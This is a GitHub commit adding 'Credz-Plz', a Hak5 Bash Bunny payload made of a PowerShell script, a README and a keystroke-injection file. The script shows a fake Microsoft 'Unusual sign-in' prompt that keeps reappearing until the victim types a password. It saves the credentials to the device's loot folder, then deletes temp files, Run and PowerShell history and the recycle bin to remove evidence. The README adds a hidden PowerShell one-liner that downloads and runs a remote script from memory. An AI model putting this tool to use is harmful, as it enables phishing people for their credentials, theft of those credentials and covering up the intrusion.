Add files via upload (#523)
parent
145ffc36f6
commit
49c8edf636
|
@ -0,0 +1,178 @@
|
|||
############################################################################################################################################################
|
||||
# | ___ _ _ _ # ,d88b.d88b #
|
||||
# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
||||
# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
||||
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
|
||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
||||
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
||||
# # / \ / ~ \ #
|
||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
|
||||
|
||||
.DESCRIPTION
|
||||
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
|
||||
This will be followed by a fake authentication ui prompt.
|
||||
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
|
||||
Once the target enters their credentials their information will be uploaded to your Bash Bunny
|
||||
|
||||
#>
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
# Creating loot folder
|
||||
|
||||
# Get Drive Letter
|
||||
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
|
||||
|
||||
# Test if directory exists if not create directory in loot folder to store file
|
||||
$TARGETDIR = "$bb\loot\Credz-Plz\$env:computername"
|
||||
|
||||
if(!(Test-Path -Path $TARGETDIR )){
|
||||
mkdir $TARGETDIR
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to generate the ui.prompt you will use to harvest their credentials
|
||||
#>
|
||||
|
||||
function Get-Creds {
|
||||
do{
|
||||
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
|
||||
if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {
|
||||
[System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
|
||||
Get-Creds
|
||||
}
|
||||
$creds = $cred.GetNetworkCredential() | fl
|
||||
return $creds
|
||||
# ...
|
||||
|
||||
$done = $true
|
||||
} until ($done)
|
||||
|
||||
}
|
||||
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to pause the script until a mouse movement is detected
|
||||
#>
|
||||
|
||||
function Pause-Script{
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
|
||||
$o=New-Object -ComObject WScript.Shell
|
||||
|
||||
while (1) {
|
||||
$pauseTime = 3
|
||||
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
|
||||
break
|
||||
}
|
||||
else {
|
||||
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
|
||||
#>
|
||||
|
||||
function Caps-Off {
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
|
||||
|
||||
#If true, toggle CapsLock key, to ensure that the script doesn't fail
|
||||
if ($caps -eq $true){
|
||||
|
||||
$key = New-Object -ComObject WScript.Shell
|
||||
$key.SendKeys('{CapsLock}')
|
||||
}
|
||||
}
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
|
||||
#>
|
||||
|
||||
Pause-Script
|
||||
|
||||
Caps-Off
|
||||
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
|
||||
[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account")
|
||||
|
||||
$creds = Get-Creds
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to save the gathered credentials to a file in the temp directory
|
||||
#>
|
||||
|
||||
echo $creds >> $env:TMP\$FileName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This exfiltrates your loot to the Bash Bunny
|
||||
#>
|
||||
|
||||
Move-Item $env:TMP\$FileName $TARGETDIR\$FileName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to clean up behind you and remove any evidence to prove you were there
|
||||
#>
|
||||
|
||||
# Delete contents of Temp folder
|
||||
|
||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
|
||||
# Delete run box history
|
||||
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
|
||||
# Delete powershell history
|
||||
|
||||
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||
|
||||
# Deletes contents of recycle bin
|
||||
|
||||
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
||||
|
|
@ -0,0 +1,102 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# Credz-Plz
|
||||
|
||||
A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.
|
||||
|
||||
## Description
|
||||
|
||||
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
|
||||
This will be followed by a fake authentication ui prompt.
|
||||
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
|
||||
Once the target enters their credentials their information will be uploaded to your dropbox for collection
|
||||
|
||||
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg)
|
||||
|
||||
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg)
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* DropBox or other file sharing service - Your Shared link for the intended file
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||||
```
|
||||
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
|
@ -0,0 +1,22 @@
|
|||
# Title: Credz-Plz
|
||||
# Description: A script used to prompt the target to enter their creds to later be exfiltrated to the Bash Bunny
|
||||
# Author: I am Jakoby
|
||||
# Version: 1.0
|
||||
# Category: Recon
|
||||
# Attackmodes: HID, Storage
|
||||
# Target: Windows 10, 11
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Credz-Plz.ps1')"
|
||||
QUACK ENTER
|
Binary file not shown.
After Width: | Height: | Size: 73 KiB |
Binary file not shown.
After Width: | Height: | Size: 39 KiB |
Loading…
Reference in New Issue